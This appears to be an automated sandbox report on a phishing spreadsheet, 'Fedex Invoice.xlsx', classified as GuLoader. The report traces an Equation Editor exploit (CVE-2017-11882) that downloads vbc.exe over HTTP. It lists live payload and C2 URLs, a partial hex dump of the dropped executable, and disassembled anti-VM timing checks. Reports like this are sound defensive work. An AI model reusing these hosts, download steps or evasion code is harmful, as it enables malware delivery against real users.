Windows Analysis Report Fedex Invoice.xlsx

Overview

General Information

Sample Name: Fedex Invoice.xlsx
Analysis ID: 483375
MD5: ec7f52b07d135f71c63fd20054a89646
SHA1: c89fa952eaef37a4ad0a120fa2c998cd989bbf62
SHA256: 150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
Tags: FEDEX, VelvetSweatshop, xlsx
Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}
Multi AV Scanner detection for submitted file
Source: Fedex Invoice.xlsx Virustotal: Detection: 30%
Source: Fedex Invoice.xlsx ReversingLabs: Detection: 27%
Multi AV Scanner detection for domain / URL
Source: http://212.192.246.25/rever/vbc.exe Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Virustotal: Detection: 23%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 70MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://37.0.11.217/KELLYREMCOS_UOuJB118.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RHC-HOSTINGGB
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 14 Sep 2021 19:51:37 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
  Last-Modified: Mon, 13 Sep 2021 23:18:39 GMT
  ETag: "21000-5cbe8af7096b4"
  Accept-Ranges: bytes
  Content-Length: 135168
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 
40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /rever/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 212.192.246.25
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 212.192.246.25 (this entry is listed 50 times in the report)
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 5DD04ABC.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf
Source: global traffic HTTP traffic detected:
  GET /rever/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 212.192.246.25
  Connection: Keep-Alive

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B60 6_2_00456B60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B84C 6_2_0045B84C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455467 6_2_00455467
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A062 6_2_0045A062
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456872 6_2_00456872
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A07C 6_2_0045A07C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456C14 6_2_00456C14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453417 6_2_00453417
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454C34 6_2_00454C34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454C3C 6_2_00454C3C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A43B 6_2_0045A43B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A8CD 6_2_0045A8CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_004504E1 6_2_004504E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456CEF 6_2_00456CEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_004558F7 6_2_004558F7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004544FC 6_2_004544FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_004534F9 6_2_004534F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459C85 6_2_00459C85
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045588C 6_2_0045588C
Source: C:\Users\Public\vbc.exe Code function: 6_2_004570AD 6_2_004570AD
Source: C:\Users\Public\vbc.exe Code function: 6_2_004560A9 6_2_004560A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_004568A9 6_2_004568A9
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A4B5 6_2_0045A4B5
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459D57 6_2_00459D57
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457152 6_2_00457152
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045115A 6_2_0045115A
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B568 6_2_0045B568
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045517B 6_2_0045517B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455D07 6_2_00455D07
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454D0B 6_2_00454D0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045710A 6_2_0045710A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454515 6_2_00454515
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453D1D 6_2_00453D1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455519 6_2_00455519
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A5C7 6_2_0045A5C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A9C0 6_2_0045A9C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455DCB 6_2_00455DCB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004509E9 6_2_004509E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00452DF5 6_2_00452DF5
Source: C:\Users\Public\vbc.exe Code function: 6_2_004535F1 6_2_004535F1
Source: C:\Users\Public\vbc.exe Code function: 6_2_004545FA 6_2_004545FA
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045618F 6_2_0045618F
Source: C:\Users\Public\vbc.exe Code function: 6_2_004541A1 6_2_004541A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_004551B1 6_2_004551B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B5BB 6_2_0045B5BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B65C 6_2_0045B65C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045265F 6_2_0045265F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457267 6_2_00457267
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459A6C 6_2_00459A6C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454A77 6_2_00454A77
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455273 6_2_00455273
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455601 6_2_00455601
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045720D 6_2_0045720D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B60D 6_2_0045B60D
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045BA0B 6_2_0045BA0B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455A1C 6_2_00455A1C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AE2B 6_2_0045AE2B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454E3D 6_2_00454E3D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453E3F 6_2_00453E3F
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A63F 6_2_0045A63F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459AC5 6_2_00459AC5
Source: C:\Users\Public\vbc.exe Code function: 6_2_004546CA 6_2_004546CA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454EE0 6_2_00454EE0
Source: C:\Users\Public\vbc.exe Code function: 6_2_004532FD 6_2_004532FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451EFA 6_2_00451EFA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455EA6 6_2_00455EA6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004586A3 6_2_004586A3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B6AB 6_2_0045B6AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_004556B5 6_2_004556B5
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AAB3 6_2_0045AAB3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B5E 6_2_00456B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451F6D 6_2_00451F6D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B73 6_2_00456B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045037E 6_2_0045037E
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B779 6_2_0045B779
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451B03 6_2_00451B03
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A709 6_2_0045A709
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455B10 6_2_00455B10
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045731C 6_2_0045731C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A320 6_2_0045A320
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045AB23 6_2_0045AB23
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045533B 6_2_0045533B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045A7DE 6_2_0045A7DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459FE7 6_2_00459FE7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004557EF 6_2_004557EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455BF6 6_2_00455BF6
Source: C:\Users\Public\vbc.exe Code function: 6_2_004503F2 6_2_004503F2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450382 6_2_00450382
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045579F 6_2_0045579F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00459B98 6_2_00459B98
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045339B 6_2_0045339B
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045ABA0 6_2_0045ABA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455FAB 6_2_00455FAB
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B60 NtAllocateVirtualMemory, 6_2_00456B60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456C14 NtAllocateVirtualMemory, 6_2_00456C14
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456CEF NtAllocateVirtualMemory, 6_2_00456CEF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B5E NtAllocateVirtualMemory, 6_2_00456B5E
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456B73 NtAllocateVirtualMemory, 6_2_00456B73
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: Fedex Invoice.xlsx Virustotal: Detection: 30%
Source: Fedex Invoice.xlsx ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Fedex Invoice.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFBCB.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (listed twice in the report)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419524 push esi; retn 000Ch 6_2_00419679
Source: C:\Users\Public\vbc.exe Code function: 6_2_00451120 push FFFFFFB9h; retf 6_2_00451125
Source: initial sample Static PE information: section name: .text entropy: 7.10781804596

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (listed 10 times in the report)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (listed 8 times in the report)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000459872 second address: 0000000000459872 instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 1ECE1B4Fh
  0x00000007 xor eax, 1DCBF7C6h
  0x0000000c xor eax, 314CA14Ah
  0x00000011 sub eax, 32494DC2h
  0x00000016 cpuid
  0x00000018 popad
  0x00000019 call 00007FD8B8FCB1F8h
  0x0000001e lfence
  0x00000021 mov edx, 823F9AFEh
  0x00000026 add edx, 01EEC23Dh
  0x0000002c xor edx, 2B36126Dh
  0x00000032 xor edx, D0E64F42h
  0x00000038 mov edx, dword ptr [edx]
  0x0000003a lfence
  0x0000003d jmp 00007FD8B8FCB236h
  0x0000003f cmp bh, ch
  0x00000041 ret
  0x00000042 sub edx, esi
  0x00000044 ret
  0x00000045 test ax, bx
  0x00000048 add edi, edx
  0x0000004a dec dword ptr [ebp+000000F8h]
  0x00000050 test eax, edx
  0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h
  0x00000059 jne 00007FD8B8FCB1D7h
  0x0000005b call 00007FD8B8FCB28Bh
  0x00000060 call 00007FD8B8FCB219h
  0x00000065 lfence
  0x00000068 mov edx, 823F9AFEh
  0x0000006d add edx, 01EEC23Dh
  0x00000073 xor edx, 2B36126Dh
  0x00000079 xor edx, D0E64F42h
  0x0000007f mov edx, dword ptr [edx]
  0x00000081 lfence
  0x00000084 jmp 00007FD8B8FCB236h
  0x00000086 cmp bh, ch
  0x00000088 ret
  0x00000089 mov esi, edx
  0x0000008b pushad
  0x0000008c rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560 Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2560 Thread sleep time: -60000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045986A rdtsc 6_2_0045986A

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045986A rdtsc 6_2_0045986A
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458C21 mov eax, dword ptr fs:[00000030h] 6_2_00458C21
Source: C:\Users\Public\vbc.exe Code function: 6_2_004544FC mov eax, dword ptr fs:[00000030h] 6_2_004544FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454515 mov eax, dword ptr fs:[00000030h] 6_2_00454515
Source: C:\Users\Public\vbc.exe Code function: 6_2_00453D1D mov eax, dword ptr fs:[00000030h] 6_2_00453D1D
Source: C:\Users\Public\vbc.exe Code function: 6_2_004566CF mov eax, dword ptr fs:[00000030h] 6_2_004566CF
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045939A mov eax, dword ptr fs:[00000030h] 6_2_0045939A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.692748379.00000000007C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<